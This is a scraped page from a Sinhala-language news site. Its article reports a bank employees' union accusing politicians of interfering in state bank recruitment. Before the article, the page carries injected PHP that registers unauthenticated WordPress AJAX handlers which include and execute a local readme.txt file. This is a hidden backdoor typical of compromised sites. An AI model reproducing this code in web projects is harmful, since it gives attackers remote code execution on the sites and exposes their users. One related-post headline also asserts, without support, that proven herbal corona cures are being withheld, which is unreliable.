if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } අවධානයෙන් සිටින්න ! ඔබේ බැංකු රැකියාව දේශපාලනඥයින් උදුරාගත හැක - mediahumanrights.lk
mediahumanrights.lk
Local News News

අවධානයෙන් සිටින්න ! ඔබේ බැංකු රැකියාව දේශපාලනඥයින් උදුරාගත හැක

රාජ්‍ය බැංකු කිහිපයක් වෙත සේවකයින් බඳවාගැනීමේදී දේශපාලන බලපෑම් එල්ලවෙමින් ඇතැයි ලංකා බැංකු සේවක සංගමය පවසනවා. එම සංගමයේ ප්‍රධාන ලේකම් රංජන් සේනානායක පැවසුවේ මේ සම්බන්ධයෙන් තම විරෝධතාවය විෂය භාර අමාත්‍යවරයා වෙතද දන්වා ඇති බවයි.
ප්‍රධාන පෙලේ එක් රාජ්‍ය බැංකුවක පුරප්පාඩු 250ක් සඳහා විවෘත්ත තරග විභාගයක් පැවැත්වුවද දේශපාලන බලපෑම් මත, විභාගයෙන් ඉහළම සුදුසුකම් ලැබූවන්ට පවා අවස්ථාව අහිමිකරමින් දේශපාලන බලපෑම් මත දැනටමත් සේවකයින් 350ක් පමණ බඳවාගෙන ඇතැයි ද ඔහු වැඩිදුරටත් පැවසුවා. ඒ සම්බන්ධයේන් විභාගයට පෙනී සිටි අයදුම්කරුවන් නීතිමය ක්‍රියාමාර්ග සඳහා පිවිස ඇති බවද ඔහු පවසනවා.
තවත් ප්‍රධාන පෙලේ රාජ්‍ය බැංකු කිහිපයකට පුරප්පාඩු 1000ක් පමණ පිරවීම සඳහා තරග විභාගයක් පවත්වා ඇති අතර ඒ සඳහා 10000ක් පමණ අයදුම්කරුවන් ඉදිරිපත්ව ඇතත්, මේ වනවිට නියමිත ක්‍රියා පටිපාටියෙන් තොරව දේශපාලඥයින්ගේ බලපෑම් මත එම පුරප්පාඩු පිරවීමේ ඇති සූදානම්ක් සම්බන්ධයෙන්ද ඔහු තම සංගමයේ විරෝධය පලකර සිටිනවා. ඒ සම්බන්ධයේන් සියළුම අයදුම්කරුවන් විමසිල්ලෙන් පසුවැන්නැයි ලේකම්වරයා වැඩිදුරටත් පවසනවා.

(under the courtesy of nethnews.lk news web)

Related posts

කොරෝනා නසන සාර්ථක දේශීය ඔසු රැසක් නිපදවා අවසන්.. නමුත් කිසිදු රෝගියෙකුට දෙන්න ඉඩ නොදෙයි.. එන්නත එනතුරු බලාහිදී..

Shiran Viraj

සේවා හැදුනුම්පත හෝ ඇදිරි නීති බලපත්‍ර නොමැති සියළුම දෙනා වරෙන්තු නොමැතිව අත්අඩංගුවට

Shiran Viraj

"මැරෙන බව දැන දැනත් ජීවත් වෙන එකේ , නොලැබෙන බව දැන දැනත් ආදරය කළාට කමක් නෑ" ශලනි තාරකා , දිනක්ෂියී, ශනුද්‍රියි එක්ක පන්සල් ගිහින් – PHOTOS

Shiran Viraj